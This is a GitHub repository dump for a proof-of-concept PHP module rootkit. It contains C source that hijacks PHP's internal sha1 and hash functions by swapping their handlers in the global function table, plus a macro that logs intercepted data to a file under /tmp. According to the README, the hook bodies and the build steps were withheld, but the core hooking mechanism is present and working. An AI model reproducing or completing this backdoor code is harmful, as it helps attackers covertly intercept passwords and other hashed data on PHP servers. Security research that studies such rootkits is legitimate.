├── .gitignore ├── LICENSE.md ├── README.md ├── lib └── .gitignore └── src ├── rootkit.c ├── rootkit_config.h ├── rootkit_hook.c └── rootkit_hook.h /.gitignore: -------------------------------------------------------------------------------- 1 | lib/php-src/ 2 | **/*.lo 3 | **/.libs 4 | -------------------------------------------------------------------------------- /LICENSE.md: -------------------------------------------------------------------------------- 1 | Copyright 2017 - Luke Paris (Paradoxis) 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, 4 | including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to 5 | do so, subject to the following conditions: 6 | 7 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 8 | 9 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND 10 | NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF 11 | OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 12 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PHP Backdoor 2 | PHP module based backdoor to intercept standard-library & module function calls. For a full explanation of what this is, why it was made and how it works, please refer to my blog post [Your interpreter isn’t safe anymore — The PHP module rootkit](https://blog.paradoxis.nl/your-interpreter-isnt-safe-anymore-the-php-module-rootkit-c7ca6a1a9af5). 3 | 4 | 5 | ## Compilation 6 | To prevent malicious script kiddies from getting their hands on a weaponized PHP module, I've removed the compilation instructions alongside the implementation of the method hooks. 7 | 8 | Furthermore, I will not be releasing pre-compiled binaries. Any semi-experienced C developer should be able to find out how to compile PHP modules and implement the the `rootkit_hook_function` 9 | method. 10 | 11 | Issues created regarding this will not be addressed and closed. 12 | 13 | 14 | ## Disclaimer 15 | Using this module might cause severe damage to your system, it was created as a proof of concept and should 16 | never be used on a production system! 17 | 18 | By using this software the person in question agrees that they will use any of software in question in an ethical (non-malicious) way and agrees that the developer(s) are NOT held responsible for any damage caused by the use and or abuse of this software. 19 | 20 | Misuse of any software from this website may result in criminal charges brought against the person in question depending on the country or state of residence which can result in probation, fines up or prison sentences up to 20 years in federal prison. 21 | 22 | 23 | ## License 24 | Copyright 2017 - Luke Paris (Paradoxis) 25 | 26 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: 27 | 28 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 29 | 30 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 31 | -------------------------------------------------------------------------------- /lib/.gitignore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Paradoxis/PHP-Backdoor/a9c519b4b859d7a2327edde867cb0166aec7812c/lib/.gitignore -------------------------------------------------------------------------------- /src/rootkit.c: -------------------------------------------------------------------------------- 1 | // Libraries & frameworks 2 | #include "php.h" 3 | 4 | // Rootkit logic & configuration 5 | #include "rootkit_config.h" 6 | #include "rootkit_hook.h" 7 | #include "rootkit_hook/hash.h" 8 | 9 | 10 | /** 11 | * On module init 12 | * Hook function calls such as 'md5' 'sha1' 'PDO' 'mysql_connect' 13 | */ 14 | PHP_MINIT_FUNCTION(rootkit) 15 | { 16 | rootkit_hook_function("sha1", hash__sha1_hook, &hash__sha1_original); 17 | rootkit_hook_function("hash", hash__hash_hook, &hash__hash_original); 18 | return SUCCESS; 19 | } 20 | 21 | /** 22 | * Module entry 23 | * Defines the module itself 24 | */ 25 | zend_module_entry rootkit_module_entry = { 26 | STANDARD_MODULE_HEADER, 27 | ROOTKIT_NAME, 28 | NULL, /* All exposed functions, only to test POC, will get removed later */ 29 | PHP_MINIT(rootkit), /* On module startup */ 30 | NULL, /* On module shutdown */ 31 | NULL, /* On request start */ 32 | NULL, /* On request end */ 33 | NULL, /* Module info, used in phpinfo(); */ 34 | ROOTKIT_VERSION, 35 | STANDARD_MODULE_PROPERTIES 36 | }; 37 | 38 | /** 39 | * ZEND_GET_MODULE 40 | * 41 | * Description: 42 | * Provides additional C code used if you want to build a dynamic loaded extension. 43 | * 44 | * Parameters: 45 | * extension name - Name of the extension. 46 | * 47 | * Example: 48 | * // Enables DSO (Dynamic Shared Object) support for curl_extension 49 | * ZEND_GET_MODULE (curl_extension) 50 | * 51 | * Source: 52 | * http://webcache.googleusercontent.com/search?q=cache:tfNxKPKE3gEJ:php.webtutor.pl/en/2001/07/07/zend_get_module/+&cd=1&hl=en&ct=clnk&gl=nl 53 | */ 54 | ZEND_GET_MODULE(rootkit) 55 | -------------------------------------------------------------------------------- /src/rootkit_config.h: -------------------------------------------------------------------------------- 1 | #ifndef ROOTKIT_CONFIG_H 2 | #define ROOTKIT_CONFIG_H 3 | 4 | // Rootkit configuration 5 | #define ROOTKIT_NAME "rootkit" 6 | #define ROOTKIT_VERSION "0.0.1" 7 | #define ROOTKIT_DEBUG 1 8 | #define ROOTKIT_INTERCEPT_OUTPUT "/tmp/php-module-rootkit.txt" 9 | 10 | // Custom printf macro to strip all debug messages on compile-time 11 | // Removes debugging strings from appearing during runtime & in the binary 12 | #if ROOTKIT_DEBUG == 1 13 | #define ROOTKIT_PRINTF(...) php_printf(__VA_ARGS__) 14 | #else 15 | #define ROOTKIT_PRINTF(...) ((void) 0) 16 | #endif 17 | 18 | // Prevents my IDE from screaming that certain macro's are not defined 19 | #ifndef SUCCESS 20 | #define SUCCESS 1 21 | #endif 22 | 23 | #endif 24 | -------------------------------------------------------------------------------- /src/rootkit_hook.c: -------------------------------------------------------------------------------- 1 | #include "php.h" 2 | 3 | #include "rootkit_config.h" 4 | 5 | /** 6 | * Method to easily hook a method in a module by their names 7 | * All implementations are located in 'rootkit_hook/.(c|h)' 8 | * 9 | * Arguments: 10 | * method_name - Method to hook 11 | * hook - Hook to apply 12 | * original - Address to store the original pointer in 13 | */ 14 | bool rootkit_hook_function( 15 | const char* method_name, 16 | void (*hook)(INTERNAL_FUNCTION_PARAMETERS), 17 | void (**original)(INTERNAL_FUNCTION_PARAMETERS) 18 | ) { 19 | // Found function will be temporarily stored in this 20 | zend_function *function; 21 | 22 | // Check wether or not a hook & original variable were actually passed 23 | if (!hook || !original) { 24 | ROOTKIT_PRINTF("Unable to apply hook, no hook address / original address holder provided!\n"); 25 | return false; 26 | } 27 | 28 | // Remove the current function from the compiler_globals.function_table hash 29 | // and replace it with our hooked function instead :) 30 | if ((function = zend_hash_str_find_ptr(CG(function_table), method_name, strlen(method_name))) != NULL) { 31 | *original = function->internal_function.handler; 32 | function->internal_function.handler = *hook; 33 | ROOTKIT_PRINTF("Successfully hooked function '%s' (original: %p) -> (hook: %p)\n", method_name, &original, &hook); 34 | return true; 35 | } else { 36 | ROOTKIT_PRINTF("Unable to locate function '%s' in global function table.\n", method_name); 37 | return false; 38 | } 39 | } 40 | -------------------------------------------------------------------------------- /src/rootkit_hook.h: -------------------------------------------------------------------------------- 1 | #ifndef ROOTKIT_HOOK_H 2 | #define ROOTKIT_HOOK_H 3 | 4 | #include "php.h" 5 | #include "rootkit_config.h" 6 | 7 | bool rootkit_hook_function( 8 | const char* method_name, 9 | void (*hook)(INTERNAL_FUNCTION_PARAMETERS), 10 | void (**original)(INTERNAL_FUNCTION_PARAMETERS) 11 | ); 12 | 13 | #define rootkit_write_output(format, args...) \ 14 | FILE *output = fopen(ROOTKIT_INTERCEPT_OUTPUT, "a+"); \ 15 | fprintf(output, format, ## args); \ 16 | fclose(output); 17 | 18 | #endif 19 | --------------------------------------------------------------------------------